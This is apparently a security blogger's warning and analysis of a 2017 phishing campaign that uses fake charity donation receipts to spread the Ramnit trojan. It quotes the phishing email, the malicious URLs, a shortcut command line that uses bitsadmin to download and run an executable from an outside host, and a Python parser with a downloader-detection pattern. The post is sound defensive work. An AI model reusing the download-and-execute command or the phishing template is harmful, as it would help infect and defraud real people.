It is difficult to think of a more evil scam than to pretend to collect donations for Migrant Helpline, use spoofed emails saying thanks for the donation to Migrant Helpline and deliver malware to the email recipient.
Update 11 January 2017: Another set, this time pretending to be NEJ-Donations. After being sent a few more of these, I can see that they are actually using random characters before "Donations" in the charity name, so you get alleged charities like HHGG-Donations, FGTD-Donations, etc. The John Smith Drive address remains constant, although the town and phone number change in each sample. Thanks to all the concerned people who have sent these to me.
NEJ-Donations works with others to overcome poverty and suffering. NEJ-Donations GB is a member of NEJ-Donations International. NEJ-Donations is a registered charity in England and Wales (no 559061) and Scotland (SCO 809501) and a company limited by guarantee registered in England No 144836 at NEJ-Donations House, John Smith Drive, AB53 Kirktown of Auchterless. Registered Charity No. 841330. Tel: 28985029393.
The link in the email goes to 'http://ref642.spinawind.com/donation-receipt-11012017-69657278.pdf', which downloads a .lnk file from virtualonhold.com/donation-receipt-11012017-69657278.lnk. That file is base64 encoded. My feeble attempts at decoding it to get a download URL are failing and giving me garbage. Hopefully one of my contacts will work it out. Zip file (password "infected"): donation-receipt-11012017-69657278.lnk. Now decoded to https://weddingvendorsnearme.com/rugby/goal, which gives goal.exe when you use a user agent of "null" (VirusTotal) (Payload Security). I am pretty certain this will be Ramnit again.
Update 10 January 2017: I was handed a tip this morning. Set the user agent to null and you get the payload from http://gerdamen.info/cass/cars/moto (VirusTotal) (Payload Security). Now analysing to see what it actually is. Some feedback suggests the Ramnit Trojan, which hasn't been affecting the UK for a long time.
Update 2, 10 January 2017: There is a new malspam run of these emails coming out again tonight. The email looks functionally identical to the previous ones. It is very unusual for phishing or malware emails to have such a level of detail about the recipient/victim. They must have gained access to a hacked/compromised database somewhere. This sort of spear phishing with identifiable personal details is the hardest to protect against. A victim receiving such an email almost automatically believes it must be true and real because it uses their name and phone number, panics and clicks the link to see what is happening. Note that the malware gang are using an HTTPS site with a valid certificate. The HTTPS padlock in the browser bar only means the connection is encrypted; it does not mean the site is safe.
If you do not click the link in the email then you are safe and cannot be infected by it; there is no attachment, and the infection chain only starts when the link is followed and the downloaded file is run. Just delete the email and forget about it.
The link behind the donation reference goes to http://donation03395665.blixt.us/tanya-thank-you-for-donation-reference-73160326.pdf (the name before "thank-you" is the recipient's name), which bounces you silently on to https://openboxoffice.com/view/user/YeshivaDonations/Word/Donation_Reference.doc, where you get a page looking like this screenshot.
If you are unwise enough to press the button saying "download and install plugin update", you get a download of a .JS file (ie_update_plugin_extension.js) from https://openboxoffice.com/view/update/ZS93YVZZMTNONHQrdHNNMGhIcWR1cWQvK2k2YVlVYkNXRUpSaWU5OFFjTnd5SmZ4aUNYYitHUXp5Nnp1bE5KbA%3D%3D (VirusTotal) (Payload Security), which downloads via PowerShell from 'http://uirok.info/old/ma', where, if you visit with a user agent of NULL, you get ma.exe (VirusTotal) (Payload Security). I am reliably informed it is Ramnit.
If you try to follow the original link from the email again, you get a page that has what appears to be a genuine invoice and no click buttons.
I assume openboxoffice.com is a hacked/compromised site, because it has been registered for a long time (10 years). Currently hosted by EU-HOSTSAILOR 18.104.22.168.
More recipients have been contacting me and informing me that the emails they are receiving appear to be directly targeting them, because they contain personal information that is not commonly available. I am informed that the full name appearing in the body of the email is correct, the phone number is a correct number, and, the worst part of it, the email address and variant of the name were only ever used on PayPal or eBay, nowhere else to the "victim's" knowledge. This leads me to surmise that there has been a data leak somewhere. I personally doubt that it was eBay or PayPal themselves, otherwise we would have heard about it by now. My gut feeling is that, if we were able to dig deep enough and get enough information from recipients, we would eventually find a common link, possibly an eBay shop where the "owner" has been hacked. Unfortunately many eBay shops also have their own web-based shop using common CMS and shop software that gets frequently compromised.
Note: there are genuine yeshiva donation sites in various places on the web. A yeshiva is a Jewish educational institution often funded by charitable individual donations. There is a genuine domain donation.yeshivadonations.com, and yeshivadonations.com appears to be hosted by Hostgator 22.214.171.124. I am guessing that the DNS has been compromised to divert to this Hostgator site, because the domain is registered to and was previously hosted by GoDaddy. It would be extremely unusual for a site that has been registered for a few years to be used for serving up malware unless it was compromised in some way. At 11.00 UTC on 10 January 2017, all links on yeshivadonations.com are giving a 404, so hopefully Hostgator has taken down the site doing the spreading. However, be aware that the actual site hosting the malware, http://gerdamen.info/cass/cars/moto, is still live and will infect you if you open a .lnk file you downloaded earlier by clicking the link in the email.
The email just has an image as the body content :
The link goes to http://<random characters>.fastfashun.com/thank-you-for-donation-reference.pdf
Examples: http://uolarjs.fastfashun.com/thank-you-for-donation-reference.pdf and http://bxbpmbhrc.fastfashun.com/thank-you-for-donation-reference.pdf
This redirects to https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk. I can download the .lnk file but cannot get any payload from the site referenced inside the file, http://gerdamen.info/cass/cars/moto, which gives me a 403 Forbidden. I don't know if it requires a referrer from the link or will only accept BITS as a user agent. Trying to run it through Payload Security, I get told it is a 64-bit file which will not run on a 32-bit system ("Cannot run a 64-bit native file on a 32-bit virtual machine").
Strings recovered from the .lnk file (the raw binary dump has been omitted; only the readable fields are kept):
Target: ..\..\..\..\..\..\Windows\System32\cmd.exe (resolves to C:\Windows\System32\cmd.exe on Windows 7)
Working directory: C:\Windows\system32
Arguments: /c explorer.exe & bitsadmin.exe /transfer d /priority high http://gerdamen.info/cass/cars/moto %AppData%\moto.exe & %AppData%\moto.exe
Icon: %SystemRoot%\system32\SHELL32.dll
Tracker data: machine name windows-t5vm49e, SID S-1-5-21-2061442247-598770051-3344046446-1000
So the shortcut launches explorer.exe as a decoy, uses bitsadmin.exe (a legitimate Windows download tool) to fetch the payload into %AppData%\moto.exe, and then runs it.
That is as far as I can get. Let's see what the real experts can do.
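The command line above is held in the .lnk file's StringData section as a UTF-16LE string, which is why reading the file as text, or base64-decoding the download and eyeballing it, gives "garbage". The following is an added example, not code from the original post: a minimal parser for the public shell-link layout ([MS-SHLLINK]: 76-byte header, optional IDList and LinkInfo blocks, then the string fields), a loader that accepts either a raw .lnk or a base64 wrapper around one, and a triage check that flags arguments combining a URL with a known download tool such as bitsadmin. The sample shortcut it parses is constructed inline to mirror the strings in the dump above; it is not the real file from the campaign, and the regex list of download tools is an assumption, not something the post states.

```python
import base64
import re
import struct

# Layout follows the public [MS-SHLLINK] spec: fixed 76-byte header, optional
# IDList and LinkInfo blocks, then the StringData fields we care about.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]

# Constructed sample modelled on the strings in the dump above; not the real file.
SAMPLE_ARGS = ("/c explorer.exe & bitsadmin.exe /transfer d /priority high "
               "http://gerdamen.info/cass/cars/moto %AppData%\\moto.exe "
               "& %AppData%\\moto.exe")


def _string_data(s: str) -> bytes:
    # StringData entry: uint16 character count, then UTF-16LE chars, no terminator.
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_sample_lnk(args: str = SAMPLE_ARGS) -> bytes:
    """Build a minimal Unicode shell link with only the StringData fields set."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))     # attributes, timestamps, etc.
    return (header
            + _string_data("..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe")
            + _string_data("C:\\Windows\\system32")
            + _string_data(args)
            + _string_data("%SystemRoot%\\system32\\SHELL32.dll"))


def sample_base64_blob() -> bytes:
    """The same constructed sample wrapped in base64, as the post says the download was."""
    return base64.b64encode(build_sample_lnk())


def load_lnk(blob: bytes) -> bytes:
    """Return raw .lnk bytes from either a raw file or a base64 text wrapper."""
    if blob[:4] == b"L\x00\x00\x00":             # HeaderSize 0x4C == 'L'
        return blob
    decoded = base64.b64decode(blob)
    if decoded[:4] != b"L\x00\x00\x00":
        raise ValueError("neither a shell link nor base64 of one")
    return decoded


def parse_lnk(data: bytes) -> dict:
    """Walk the header and skip IDList/LinkInfo to reach the StringData fields."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 20)
    pos = header_size
    if flags & HAS_IDLIST:                       # uint16 size, then the item IDs
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINKINFO:                     # uint32 size that includes itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# Assumed list of Windows binaries commonly abused to fetch a second stage.
DOWNLOADER_RE = re.compile(
    r"\b(bitsadmin|certutil|powershell|mshta|wscript|cscript|regsvr32)(?:\.exe)?\b", re.I)


def triage(fields: dict) -> dict:
    """Flag a link whose arguments both name a download tool and carry a URL."""
    args = fields.get("arguments", "")
    urls = URL_RE.findall(args)
    tools = sorted({m.group(1).lower() for m in DOWNLOADER_RE.finditer(args)})
    return {"urls": urls, "downloaders": tools,
            "suspicious": bool(urls) and bool(tools)}


if __name__ == "__main__":
    parsed = parse_lnk(load_lnk(sample_base64_blob()))
    for key, value in parsed.items():
        print(f"{key:14s} {value}")
    print(triage(parsed))
```

On a real sample, read the downloaded file in binary mode and pass it to load_lnk; the "arguments" field is where the download URL and the dropped-file path appear, and the "relative_path" of ..\..\..\Windows\System32\cmd.exe is the tell that a "PDF" or "receipt" shortcut actually launches a command shell.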
Update: I have received additional emails now with slightly different content in them:
Date: 9 January 2017 at 11:09:08 GMT
Subject: Thank you for choosing to donate to Migrant Helpline
Thank you for giving a much-needed donation of £361 to help families affected by the terrifying violence in Syria. With so many people who need our support, your gift is vital and greatly appreciated. Email not displaying correctly?
Thanks again for donating
We’re sending it straight to Migrant Helpline so you’ll be making a difference very soon.
Your donation details:
First name:
Last name:
Tel.
Amount: £361
Donation Reference: 47173243
If you have any questions about your donation, please follow this link and download Your (Donation Reference 47173243), with the transaction details listed above. With your help, YeshivaDonations can continue to work in Syria and neighbouring countries to deliver clean water and life-saving supplies to millions of people. Thank you again for your support. Your generosity is bringing much-needed assistance to families who have lost everything as a result of the crisis in Syria.
Warm regards,
YeshivaDonations
YeshivaDonations works with others to overcome poverty and suffering. YeshivaDonations GB is a member of YeshivaDonations International. YeshivaDonations is a registered charity in England and Wales (no 460744) and Scotland (SCO 945744) and a company limited by guarantee registered in England No 633693 at YeshivaDonations House, John Smith Drive, DL10 Whitwell. Registered Charity No. 738020. Tel: 76209829767.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments.
Internet communications are not guaranteed to be secure or virus-free. The Barclays Group does not accept responsibility for any loss arising from unauthorised access to, or interference with, any Internet communications by any third party, or from the transmission of any viruses. Replies to this e-mail may be monitored by the Barclays Group for operational or business reasons.
Any opinion or other information in this e-mail or its attachments that does not relate to the business of the Barclays Group is personal to the sender and is not given or endorsed by the Barclays Group.
Barclays Bank PLC. Registered in England and Wales (registered no. 1026167). Registered Office: 1 Churchill Place, London, E14 5HP, United Kingdom. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register No. 122702).
The link in this email goes to http://donation62453.crypid.com/Sonia-thank-you-for-donation-reference-47173243.pdf but still downloads the same .lnk file from https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk.
There is no YeshivaDonations GB listed with the Charity Commission. None of the charity numbers listed in the emails exist or belong to any known charity in the UK.